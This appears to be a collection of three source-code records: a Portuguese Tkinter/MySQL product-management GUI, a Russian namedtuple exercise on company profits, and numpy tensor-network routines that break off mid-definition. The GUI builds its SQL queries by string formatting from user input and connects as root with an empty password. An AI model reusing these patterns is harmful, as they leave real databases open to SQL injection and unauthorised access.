entryUnidade.delete(0,END)\n\n time.sleep(2)\n messagebox.showinfo(title=\"Info\",message=\"Produto cadastrado com sucesso!\")\n \n \n\n mycursor.close()\n connection.commit()\n connection.close()\n \n # elif nome in i:\n # messagebox.showwarning(\"Warning\",\"Produto já cadastrado!\\n\\nEsse nome já pertence a um produto existente.\")\n\n def ExcluirProdutos():\n connection = pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n codProd = str(cod_entry.get()) \n\n sqldelete = \"delete from produtos where cod_produto = {};\".format(codProd)\n mycursor.execute(sqldelete)\n # print(sqldelete)\n mycursor.close()\n connection.commit()\n connection.close()\n\n cod_entry.delete(0, END)\n\n time.sleep(2)\n messagebox.showinfo(\"Info\",\"Produto excluido.\")\n\n \n\n def EditarProdutos():\n def UpdateProdutos():\n \n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n\n entrycod[\"state\"] =\"normal\"\n cod = entrycod.get()\n entrycod[\"state\"] =\"disabled\" \n ean = entryean.get()\n nome = entrynome.get()\n \n prevenda = entryprevenda.get()\n precusto = entryprecusto.get()\n estoque = entryestoque.get()\n \n\n # Script de Update\n sqlupdate = \"UPDATE produtos SET ean_produto = {},nome_produto ='{}', categoria_produto='{}',unidade_produto= '{}', descricão_produto ='{}', pre_venda_produto = {}, pre_custo_produto = {}, estoque = {} where cod_produto ={}\".format(ean,nome, 
comboboxcat.get(),entryUnidade.get(),entrydescrição.get(\"1.0\",END),prevenda,precusto,estoque,cod)\n print(sqlupdate)\n mycursor.execute(sqlupdate)\n\n mycursor.close()\n connection.commit()\n connection.close() \n\n\n connection = pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n codProd = str(cod_entry.get()) \n\n sqlPesquisar = \"SELECT * FROM produtos where cod_produto= {}\".format(codProd)\n mycursor.execute(sqlPesquisar)\n\n for produto in mycursor:\n print(produto)\n\n window = gui.Tk()\n window.title(\"Lanchonete | Editar Produtos\")\n window.iconbitmap(\"imagens/ico.lanchonete.ico\")\n window.geometry(\"770x300\") # WxH\n window.resizable(False,False)\n window.configure(bg=\"#DCDCDC\")\n\n #=================notebook========================\n # mynot = ttk.Notebook(window, width= 710, height=450) # criando notebook\n # mynot.pack(pady=65)\n\n # ------------Frames----------------------------------\n \n #=================labels e entrys========================\n # lblanchonetename = Label(window, text=\"Sistema Lanchonete\", bg=\"#DCDCDC\", fg=\"#363636\", bd=0.01, font=\"Broadway 35 bold\")\n # lblanchonetename.place(x=100, y=0)\n #codigo\n labelcod = gui.Label(window,text=\"Cód. Produto:\", font=\"Britannic 10 bold\")\n labelcod.grid(row=0,column=0,sticky=W) # sticky -> para ficar um pouco mais para o oeste\n\n \n entrycod = gui.Entry(window, width=35, bd=4)# state=\"disabled\")\n entrycod.grid(row=0, column=1,padx=5,pady=3,ipady=3) # ipady -> para altura do entry | padxe pady -> espaço ao redor\n \n #EAN\n labelean = gui.Label(window,text=\"EAN/GTIN:\",font=\"Britannic 10 bold\")\n labelean.grid(row=1,column=0,sticky=W)\n\n entryean = gui.Entry(window, width=35, bd=4)\n entryean.grid(row=1, column=1,padx=5,pady=3,ipady=3)\n #nome\n labelnome = gui.Label(window,text=\"Nome:\",font=\"Britannic 10 bold\")\n labelnome.grid(row=2,column=0,sticky=W)\n\n entrynome = gui.Entry(window, width=35, bd=4)\n entrynome.grid(row=2, column=1,padx=5,pady=3,ipady=3)\n #categoria\n labelcat = gui.Label(window,text=\"Categoria:\",font=\"Britannic 10 bold\")\n labelcat.grid(row=3,column=0,sticky=W)\n\n comboboxcat = ttk.Combobox(window, width=33, values=\"Lanches Salgados Doces Bebidas\", state=\"readonly\") # adicionando um Combobox\n #comboboxcat.set(\"Selecione\") # o combobox inicia vazio se não for selecionado uma opção para ele iniciar | para fazer isso usa-se o .set\n comboboxcat.grid(row=3, column=1,padx=5,pady=3,ipady=3)\n\n #Unidade\n labelUnidade = gui.Label(window,text=\"Unidade:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelUnidade.grid(row=3,column=2,sticky=W)\n\n entryUnidade = gui.Entry(window, width=10, bd=4)\n entryUnidade.grid(row=3, column=3,padx=5,pady=3,ipady=3,sticky=W)\n #preço de venda\n labelprevenda = gui.Label(window,text=\"Preço de venda:\", font=\"Britannic 10 bold\")\n labelprevenda.grid(row=0,column=2,sticky=W)\n\n entryprevenda = gui.Entry(window, width=35, bd=4)\n entryprevenda.grid(row=0, column=3,padx=5,pady=3,ipady=3)\n #preço de custo\n labelprecusto = gui.Label(window,text=\"Preço de custo:\", font=\"Britannic 10 bold\")\n labelprecusto.grid(row=1,column=2,sticky=W)\n\n entryprecusto = gui.Entry(window, width=35, bd=4)\n entryprecusto.grid(row=1, column=3,padx=5,pady=3,ipady=3)\n #estoque\n labelestoque = gui.Label(window,text=\"Estoque atual:\", font=\"Britannic 10 bold\")\n labelestoque.grid(row=2,column=2,sticky=W)\n\n entryestoque = gui.Entry(window, width=35, bd=4)\n 
entryestoque.grid(row=2, column=3,padx=5,pady=3,ipady=3)\n #descrição\n labeldescrição = gui.Label(window,text=\"Descrição:\", font=\"Britannic 10 bold\")\n labeldescrição.grid(row=4,column=0,sticky=W)\n\n entrydescrição = gui.Text(window, width=28, height=5, bd=4)\n entrydescrição.grid(row=4, column=1,padx=5,pady=3,ipady=3)\n\n btSalvar = gui.Button(window,text=\"Salvar\", fg=\"green\", bg=\"#C0C0C0\", padx=20, pady=2, borderwidth=5, command=UpdateProdutos)\n btSalvar.grid(row=6, column=4,pady=8)\n\n entrycod.insert(0,produto[0])\n # entrycod.insert(0, \"Automático\")\n entrycod[\"state\"] =\"disabled\" # desativar o entry\n entryean.insert(0,produto[1])\n entrynome.insert(0,produto[2])\n comboboxcat.set(produto[3])\n entryUnidade.insert(0,produto[4])\n entrydescrição.insert(END,produto[5],'')\n entryprevenda.insert(0,produto[6])\n entryprecusto.insert(0,produto[7])\n entryestoque.insert(0,produto[8])\n \n\n\n\n\n\n\n\n # ------------Opening Window----------------------------------\n window = gui.Tk()\n window.title(\"Lanchonete | Produtos\")\n window.iconbitmap(\"imagens/ico.lanchonete.ico\")\n window.geometry(\"750x500\") # WxH\n window.resizable(False,False)\n window.configure(bg=\"#DCDCDC\")\n\n #=================notebook========================\n mynot = ttk.Notebook(window, width= 710, height=450) # criando notebook\n mynot.pack(pady=65)\n\n # ------------Frames----------------------------------\n frame1 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame1.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame1, text=\"Cadastrar produtos\") # adicionando frame no notebook\n\n frame2 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame2.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame2, text=\"Visualisar produtos\")\n\n frame3 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame3.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame3, text=\"Excluir/Editar produtos\")\n\n #=================labels e entrys========================\n lblanchonetename = Label(window, text=\"Sistema Lanchonete\", bg=\"#DCDCDC\", fg=\"#363636\", bd=0.01, font=\"Broadway 35 bold\")\n lblanchonetename.place(x=100, y=0)\n #codigo\n labelcod = gui.Label(frame1,text=\"Cód. 
Produto:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelcod.grid(row=0,column=0,sticky=W) # sticky -> para ficar um pouco mais para o oeste\n\n entrycod = gui.Entry(frame1, width=35, bd=4)# state=\"disabled\"\n entrycod.grid(row=0, column=1,padx=5,pady=3,ipady=3) # ipady -> para altura do entry | padxe pady -> espaço ao redor\n # entrycod.insert(0,teste[0]+1)\n entrycod.insert(0, \"Automático\") # inserindo valor no entry\n entrycod[\"state\"] =\"disabled\" # desativar o entry\n #EAN\n labelean = gui.Label(frame1,text=\"EAN/GTIN:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelean.grid(row=1,column=0,sticky=W)\n\n entryean = gui.Entry(frame1, width=35, bd=4)\n entryean.grid(row=1, column=1,padx=5,pady=3,ipady=3)\n #nome\n labelnome = gui.Label(frame1,text=\"Nome:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelnome.grid(row=2,column=0,sticky=W)\n\n entrynome = gui.Entry(frame1, width=35, bd=4)\n entrynome.grid(row=2, column=1,padx=5,pady=3,ipady=3)\n #categoria\n labelcat = gui.Label(frame1,text=\"Categoria:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelcat.grid(row=3,column=0,sticky=W)\n\n comboboxcat = ttk.Combobox(frame1, width=33, values=\"Lanches Salgados Doces Bebidas\", state=\"readonly\") # adicionando um Combobox\n comboboxcat.set(\"Selecione\") # o combobox inicia vazio se não for selecionado uma opção para ele iniciar | para fazer isso usa-se o .set\n comboboxcat.grid(row=3, column=1,padx=5,pady=3,ipady=3)\n\n #Unidade\n labelUnidade = gui.Label(frame1,text=\"Unidade:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelUnidade.grid(row=3,column=2,sticky=W)\n\n entryUnidade = gui.Entry(frame1, width=10, bd=4)\n entryUnidade.grid(row=3, column=3,padx=5,pady=3,ipady=3,sticky=W)\n\n\n #preço de venda\n labelprevenda = gui.Label(frame1,text=\"Preço de venda:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelprevenda.grid(row=0,column=2,sticky=W)\n\n entryprevenda = gui.Entry(frame1, width=35, bd=4)\n entryprevenda.grid(row=0, column=3,padx=5,pady=3,ipady=3)\n #preço de custo\n labelprecusto = gui.Label(frame1,text=\"Preço de custo:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelprecusto.grid(row=1,column=2,sticky=W)\n\n entryprecusto = gui.Entry(frame1, width=35, bd=4)\n entryprecusto.grid(row=1, column=3,padx=5,pady=3,ipady=3)\n #estoque\n labelestoque = gui.Label(frame1,text=\"Estoque atual:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelestoque.grid(row=2,column=2,sticky=W)\n\n entryestoque = gui.Entry(frame1, width=35, bd=4)\n entryestoque.grid(row=2, column=3,padx=5,pady=3,ipady=3)\n #descrição\n labeldescrição = gui.Label(frame1,text=\"Descrição:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labeldescrição.grid(row=4,column=0,sticky=W)\n\n entrydescrição = gui.Text(frame1, width=28, height=5, bd=4)\n entrydescrição.grid(row=4, column=1,padx=5,pady=3,ipady=3)\n\n codexcluir = Label(frame3,text=\"Cod. 
do produto:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n codexcluir.grid(row=2,column=0, pady=20, padx=10)\n \n cod_entry = Entry(frame3, width=35, bd=4)\n cod_entry.grid(row=2,column=1,ipady=3)\n\n #=================botões==================================\n btcliente = gui.Button(frame1,text=\"Sair\", fg=\"red\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5)\n btcliente.place(x=10,y=300)\n\n btfuncionario = gui.Button(frame1,text=\"Cadastrar\", fg=\"green\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5, command=CadastrarProdutos)\n btfuncionario.place(x=145,y=300)\n\n btfuncionarioo = gui.Button(frame2,text=\"Visualizar\", fg=\"green\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5, command=VisualisarProddutos)\n btfuncionarioo.place(x=90,y=300)\n\n excluirprod = Button(frame3,text=\"Excluir\",bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5,command=ExcluirProdutos)\n excluirprod.grid(row=3,column=0,rowspan=2,columnspan=4,padx=20,pady=(0,20))\n \n editarprod = Button(frame3,text=\"Editar\", bg=\"#C0C0C0\", width= 10, padx=22, pady=2, borderwidth=5,command=EditarProdutos)\n editarprod.grid(row=5,column=0,rowspan=2,columnspan=4)\n\n #=================treeview==================================\n treeviewproduto = ttk.Treeview(frame2,columns=('id','ean','nome','cat','desc', 'precovenda','precusto', 'estq'),show='headings')\n treeviewproduto.column('id',minwidth=0,width=65)\n treeviewproduto.column('ean',minwidth=0,width=70)\n treeviewproduto.column('nome',minwidth=0,width=75)\n treeviewproduto.column('cat',minwidth=0,width=65)\n treeviewproduto.column('precovenda',minwidth=0,width=60)\n treeviewproduto.column('precusto',minwidth=0,width=60)\n treeviewproduto.column('estq',minwidth=0,width=60)\n treeviewproduto.column('desc',minwidth=0,width=200)\n\n treeviewproduto.heading('id',text=\"Cód. Prod \")\n treeviewproduto.heading('ean',text=\"EAN/GTIN \")\n treeviewproduto.heading('nome',text=\"Nome \")\n treeviewproduto.heading('cat',text=\"Categ. \")\n treeviewproduto.heading('precovenda',text=\"Pr. Venda \")\n treeviewproduto.heading('precusto',text=\"Pr. Custo \")\n treeviewproduto.heading('estq',text=\"Estoque \")\n treeviewproduto.heading('desc',text=\"Descriçao \")\n treeviewproduto.pack()\n\n # ------------Loop End----------------------------------\n window.mainloop()\n","sub_path":"produtos.py","file_name":"produtos.py","file_ext":"py","file_size_in_byte":16580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"481047667","text":"\"\"\"\n1.\tПользователь вводит данные о количестве предприятий, их наименования и прибыль\nза 4 квартала (т.е. 
4 отдельных числа) для каждого предприятия.\nПрограмма должна определить среднюю прибыль (за год для всех предприятий)\nи вывести наименования предприятий, чья прибыль выше среднего и отдельно\nвывести наименования предприятий, чья прибыль ниже среднего.\n\nПодсказка:\nДля решения задачи обязательно примените какую-нибудь коллекцию из модуля collections\nДля лучшее освоения материала можете даже сделать несколько решений этого задания,\nприменив несколько коллекций из модуля collections\n\nПример:\nВведите количество предприятий для расчета прибыли: 2\nВведите название предприятия: Рога\nчерез пробел введите прибыль данного предприятия\nза каждый квартал(Всего 4 квартала): 235 345634 55 235\n\nВведите название предприятия: Копыта\nчерез пробел введите прибыль данного предприятия\nза каждый квартал(Всего 4 квартала): 345 34 543 34\n\nСредняя годовая прибыль всех предприятий: 173557.5\nПредприятия, с прибылью выше среднего значения: Рога\n\nПредприятия, с прибылью ниже среднего значения: Копыта\n\"\"\"\n\nfrom collections import namedtuple\n\nORG = namedtuple('Organization', 'name profit')\n\n\ndef init_orgs():\n orgs = []\n count = int(input('Введите количество предприятий для расчета прибыли:'))\n while count > 0:\n name = input('Введите название предприятия:')\n profits = input('через пробел введите прибыль данного предприятия\\nза каждый квартал(Всего 4 квартала):')\n profits_nums = [int(n) for n in profits.split()]\n orgs.append(ORG(name=name, profit=sum(profits_nums)))\n count -= 1\n return orgs\n\n\ndef get_avg_profit(orgs):\n if len(orgs) == 0:\n return 0\n profit_sum = 0\n for org in orgs:\n profit_sum += org.profit\n return profit_sum / len(orgs)\n\n\ndef analize(orgs):\n avg_profit = get_avg_profit(orgs)\n print(f'Cредняя годовая прибыль всех предприятий: {avg_profit}')\n greater = []\n lower = []\n for org in orgs:\n if org.profit > avg_profit:\n greater.append(org.name)\n elif org.profit < avg_profit:\n lower.append(org.name)\n print(f'Предприятия, с прибылью выше среднего значения: {\"\".join(greater)}')\n print(f'Предприятия, с прибылью ниже среднего значения: {\"\".join(lower)}')\n\n\norganizations = init_orgs()\nanalize(organizations)\n","sub_path":"lesson5/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"128957175","text":"import numpy as np\r\nimport pdb\r\nfrom scipy import linalg\r\nimport copy\r\n\r\nepsilon = 1e-10\r\n\r\n#(...(ab)...) --> (...ab...) a and b are now different axes, though adjacent to each other\r\ndef split_axes(M, i, m, n):\r\n\t\r\n\tassert M.shape[i] == m * n\r\n\t\r\n\tM_spl = np.array( np.split(M, n, axis = i) )\r\n\tM_spl = np.moveaxis(M_spl, 0, i + 1)\r\n\t\r\n\treturn M_spl\r\n\t\r\n#(...a...b...) --> (...(ab)...) 
Index ab in place where a used to be\r\ndef merge_axes(M, i, j):\r\n\t\r\n\tM_mer = np.moveaxis(M, j, 0)\r\n\tif i > j:\r\n\t\tM_mer = np.concatenate(M_mer, axis = i - 1)\r\n\telse:\r\n\t\tM_mer = np.concatenate(M_mer, axis = i)\r\n\t\t\t\r\n\treturn M_mer\r\n\t\r\ndef matr_tensor(A, B):\r\n\tAB = np.einsum('ij,kl->ikjl', A, B)\r\n\tAB = merge_axes(AB, 0, 1)\r\n\tAB = merge_axes(AB, 1, 2)\r\n\treturn AB\r\n\r\n\r\ndef apply_double_gate(U, gamma1, lmbda, gamma2, alpha, eta):\r\n\t\r\n\tbond_dim = lmbda.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\r\n\t#In fact alpha and eta should be real, but just in case...\r\n\talpha_conj = np.conj(alpha)\r\n\teta_conj = np.conj(eta)\r\n\t\r\n\teta_sq = eta * eta_conj\r\n\talpha_sq = alpha * alpha_conj\r\n\t\r\n\t#Apply gate\r\n\tTheta = np.einsum('klij, abk, b, byl->ayij', U, gamma1, lmbda, gamma2, dtype = np.complex_)\r\n\t\r\n\tTheta_conj = np.conj(Theta)\t\r\n\t\r\n\t#Matrix is converted to form mutliplied by etas at this point, must be de-converted later\r\n\trho_DK = np.einsum('a,ayij,aYiJ,y,Y->yjYJ', alpha_sq, Theta, Theta_conj, eta, eta_conj, dtype = np.complex_)\r\n\t\r\n\trho_DK_sq = merge_axes(rho_DK, 0, 1)\r\n\trho_DK_sq = merge_axes(rho_DK_sq, 1, 2)\r\n\t\r\n\trho_DK_eigenval, rho_DK_eigenvec = linalg.eig(rho_DK_sq)\r\n\t\r\n\trho_DK_eigenvec = [ rho_DK_eigenvec[:,k] for k in range(len(rho_DK_eigenvec))]\r\n\t\r\n\t\r\n\trho_DK_reconstructed = np.zeros(rho_DK_sq.shape, dtype = np.complex_)\r\n\tfor k in range(len(rho_DK_eigenval)):\r\n\t\teigenvec_matr = np.einsum('a,b->ab', rho_DK_eigenvec[k], np.conj(rho_DK_eigenvec[k]))\r\n\t\trho_DK_reconstructed += rho_DK_eigenval[k] * eigenvec_matr\r\n\t\r\n\t\r\n\teigenlist = [ (rho_DK_eigenval[k], rho_DK_eigenvec[k]) for k in range(len(rho_DK_eigenval))]\r\n\t\r\n\teigenlist.sort(key = lambda x: -np.abs(x[0]))\r\n\t\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\tnew_lmbda = np.zeros(lmbda.shape, dtype = np.complex_)\r\n\t\r\n\t#obtain updated gamma2\r\n\tfor k in range(bond_dim):\r\n\t\tvec = split_axes(eigenlist[k][1], 0, bond_dim, site_dim)\r\n\t\tnew_gamma2[k] = vec\r\n\t\r\n\t#Set tiny values to zero(I think these are mostly numerical inaccuracies...?...need to think about this more...)\r\n\tfor x in np.nditer(new_gamma2, op_flags = ['readwrite']):\r\n\t\tif np.abs(x) < epsilon:\r\n\t\t\tx[...] = 0\r\n\t\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(eta[k]) > 1e-12:\r\n\t\t\tnew_gamma2[:,k] = new_gamma2[:,k] / eta[k]\r\n\t\telse:\r\n\t\t\tnew_gamma2[:,k] = np.zeros(new_gamma2[:,k].shape)\r\n\t\r\n\r\n\tfor k in range(bond_dim):\r\n\t\t\r\n\t\trow = np.einsum('yj,ayij,y->ai', np.conj(new_gamma2)[k], Theta, eta_sq, dtype = np.complex)\r\n\t\t\r\n\t\t#row = new_gamma1[:,k,:]\r\n\t\trow_length = np.abs(np.sqrt(np.einsum('aj,aj,a->',row, np.conj(row), alpha_sq)))\r\n\t\t\r\n\t\tnew_lmbda[k] = row_length\r\n\t\t\r\n\t\tif new_lmbda[k] < 1e-12:\r\n\t\t\tnew_lmbda[k] = 0\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\t\tnew_gamma1[:,k,:] = np.zeros(new_gamma1[:,k,:].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma1[:,k,:] = row / new_lmbda[k]\r\n\t\r\n\tfor x in np.nditer(new_gamma1, op_flags = ['readwrite']):\r\n\t\tif np.abs(x) < epsilon:\r\n\t\t\tx[...] 
= 0\r\n\t\r\n\t#Normalize\r\n\tnew_gamma1 = new_gamma1 * np.sqrt(np.sum(new_lmbda**2))\r\n\tnew_lmbda = new_lmbda / np.sqrt(np.sum(new_lmbda**2))\r\n\t\r\n\treturn new_gamma1, new_lmbda, new_gamma2\r\n\r\n\r\ndef apply_single_gate(U,gamma):\r\n\treturn np.einsum('abi,ij->abj', gamma,U)\r\n\t\r\n#Local measurement at gamma\r\ndef measurement(M, gamma, alpha, eta):\r\n\t\r\n\talpha_conj = np.conj(alpha)\r\n\talpha_sq = alpha * alpha_conj\r\n\t\r\n\teta_conj = np.conj(eta)\r\n\teta_sq = eta * eta_conj\r\n\t\r\n\texpec = np.einsum('ayi,ayj,a,y,ij->', np.conj(gamma), gamma, alpha_sq, eta_sq, M)\r\n\treturn np.abs(expec) #This should be real anyway\r\n\t\r\n\r\n#Local projection at a site, and normalization. Note that this will \r\n#mess up the left and right Schmidt decompositions, and these will have to be\r\n#updated.\r\ndef project(P, alpha, gamma, eta):\r\n\t\r\n\talpha_sq = alpha * np.conj(alpha)\r\n\teta_sq = eta * np.conj(eta)\r\n\t\r\n\tnew_gamma = np.einsum('ij,ayj->ayi', P, gamma)\r\n\t\r\n\t\r\n\tnew_gamma_norm = np.einsum('ayi,ayi,a,y->', new_gamma, np.conj(new_gamma), alpha_sq, eta_sq)\r\n\t\t\r\n\tif new_gamma_norm < 1e-12:\r\n\t\tnew_gamma = np.zeros(new_gamma.shape)\r\n\telse:\t\r\n\t\tnew_gamma = new_gamma / np.sqrt(new_gamma_norm)\r\n\r\n\t\r\n\treturn new_gamma\r\n\t\r\n#Updates the Schimidt decomposition. \r\n#That is, we will 'fix' gamma2's left Schmidt decomp. \r\ndef update_schmidt_left(gamma1, alpha, gamma2, eta):\r\n\t\r\n\tbond_dim = gamma1.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\t\r\n\t#Incorporate the lmbdas into the entries of gamma1\r\n\tgamma_actual = np.einsum('a,y,ayi->ayi', alpha, eta, gamma2)\r\n\t#Now we can treat alpha and eta as orthnormal basis for left and right of our site\r\n\t\r\n\tgamma_matrix = merge_axes(gamma_actual, 1, 2)\r\n\t\r\n\tU, S, V = np.linalg.svd(gamma_matrix)\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_alpha = np.zeros(eta.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\t\r\n\tnew_alpha = S[:bond_dim]\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tnew_gamma2[k] = split_axes(V[k], 0, bond_dim, site_dim)\r\n\t#I don't think that I need to 're-incorporate' size of new_alpha's, \r\n\t#I believe that the svd does that for me\r\n\t\r\n\t#Re-incorporate size of eta's\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(eta[k]) < 1e-12:\r\n\t\t\tnew_gamma2[:,k] = np.zeros(new_gamma2[:,k].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma2[:,k] = new_gamma2[:,k] / eta[k]\r\n\t\r\n\t#V interpreted as matrix of new basis coefficients for gamma2 \r\n\tnew_gamma1 = np.einsum('ik,aij->akj', U, gamma1)\r\n\t\r\n\t#kill off rows/columns attached to tiny lambda values\r\n\t#These shouldn't be a problem anyway, but they annoy me and \r\n\t#seems like they could mess up things in some subtle way later\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(new_alpha[k]) < 1e-12:\r\n\t\t\tnew_alpha[k] = 0\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\t\tnew_gamma1[:,k] = np.zeros(new_gamma1[:,k].shape)\r\n\t\r\n\treturn new_gamma1, new_alpha, new_gamma2\r\n\r\n#Fixes gamma1's right Schmidt decomposition\r\ndef update_schmidt_right(alpha, gamma1, eta, gamma2):\r\n\t\r\n\tbond_dim = gamma1.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\t\r\n\t#Incorporate the lmbdas into the entries of gamma1\r\n\tgamma_actual = np.einsum('a,y,ayi->ayi', alpha, eta, gamma1)\r\n\t#Now we can treat alpha and eta as orthnormal basis for left and right of our site\r\n\t\r\n\tgamma_matrix = 
merge_axes(gamma_actual, 0, 2)\r\n\t\r\n\tU, S, V = np.linalg.svd(gamma_matrix)\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_eta = np.zeros(eta.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\t\r\n\tnew_eta = S[:bond_dim]\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tnew_gamma1[:,k] = split_axes(U[:,k], 0, bond_dim, site_dim)\r\n\t#I don't think that I need to 're-incorporate' size of new_eta's, \r\n\t#I believe that the svd does that for me\r\n\t\r\n\t#Re-incorporate size of alpha's\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(alpha[k]) < 1e-12:\r\n\t\t\tnew_gamma1[k] = np.zeros(new_gamma1[k].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma1[k] = new_gamma1[k] / alpha[k]\r\n\t\r\n\t#V interpreted as matrix of new basis coefficients for gamma2 \r\n\tnew_gamma2 = np.einsum('ki,iyj->kyj', V, gamma2)\r\n\t\r\n\t#kill off rows/columns attached to tiny lambda values\r\n\t#These shouldn't be a problem anyway, but they annoy me and \r\n\t#seems like they could mess up things in some subtle way later\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(new_eta[k]) < 1e-12:\r\n\t\t\tnew_eta[k] = 0\r\n\t\t\tnew_gamma1[:,k] = np.zeros(new_gamma1[:,k].shape)\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\r\n\treturn new_gamma1, new_eta, new_gamma2\r\n\t\r\n#Locally projects at site i using projector P, then updates the Schmidt decompositions\r\n#to the left and right.\r\ndef project_and_update(gamma_list, lmbda_list, P, i):\r\n\r\n\tL = len(gamma_list)\r\n\t\r\n\tgamma_list[i] = project(P, lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\r\n\t#Update left Schmidt decompositions\r\n\t\r\n\tfor k in range(i - 1, -1, -1): \r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_left(gamma_list[k], lmbda_list[k], gamma_list[k + 1], lmbda_list[k + 1])\r\n\t\t\r\n\t#Right schmidt decompositions\r\n\tfor k in range(i, L - 1):\r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_right( lmbda_list[k - 1], gamma_list[k], lmbda_list[k], gamma_list[k + 1])\r\n\t\r\n\t\r\n\treturn gamma_list, lmbda_list\r\n\t\r\n#############################################\r\n############### BETA FORMAT #################\r\n#############################################\r\n\r\n#Convert to beta form, useful for iterating applying double gates.\r\ndef convert_to_beta(gamma_list, lmbda_list):\r\n\t\r\n\tbeta_list = [ np.einsum('abi,b->abi', gamma_list[k], lmbda_list[k]) for k in range(len(gamma_list)) ]\r\n\t\r\n\treturn beta_list, lmbda_list\r\n\t\r\ndef convert_from_beta(beta_list, lmbda_list):\r\n\t\r\n\tbond_dim = beta_list[0].shape[0]\r\n\t\r\n\tgamma = [np.zeros(beta_list[i].shape, dtype = np.complex_) for i in range(len(beta_list))]\r\n\tlmbda = [np.zeros(lmbda_list[i].shape, dtype = np.complex_) for i in range(len(beta_list))]\r\n\t\r\n\tfor i in range(len(beta_list)):\r\n\t\tfor k in range(bond_dim):\r\n\t\t\tif np.abs(lmbda_list[i][k]) < 1e-12:\r\n\t\t\t\t#leave gamma_list[i][:,k] as zeros\r\n\t\t\t\tlmbda[i][k] = 0\r\n\t\t\telse:\r\n\t\t\t\tlmbda[i][k] = lmbda_list[i][k]\r\n\t\t\t\tgamma[i][:,k] = beta_list[i][:,k] / lmbda[i][k]\r\n\t\r\n\treturn gamma, lmbda\r\n\r\n\r\n#Apply the gate U to sites at beta1 and beta2. 
Iterating this transformation leads\r\n#to greater numerical stability because there is no division by small singular values\r\ndef apply_double_gate_beta(U, alpha, beta1, beta2):\r\n\t\r\n\tbond_dim = beta1.shape[0]\r\n\tsite_dim = beta1.shape[2]\r\n\t\r\n\tPsi = np.einsum('abi,byj->ayij', beta1, beta2)\r\n\t\r\n\tTheta = np.einsum('ayij,ijkl->aykl', Psi, U)\r\n\t\r\n\tTheta_alpha = np.einsum('a,aykl->aykl', alpha, Theta)\r\n\t\r\n\tTheta_matrix = merge_axes(Theta_alpha, 0,2)\r\n\tTheta_matrix = merge_axes(Theta_matrix, 1,2)\r\n\t\r\n\tU, S, V = np.linalg.svd(Theta_matrix)\r\n\t\r\n\tnew_beta2 = split_axes(V, 1, bond_dim, site_dim)[:bond_dim] \r\n\t\r\n\tlmbda = S[:bond_dim]\r\n\t\r\n\tnew_beta1 = np.einsum('ayij,kyj->aki', Theta, np.conj(new_beta2))\r\n\t\r\n\treturn new_beta1, lmbda, new_beta2\r\n\r\n\r\ndef 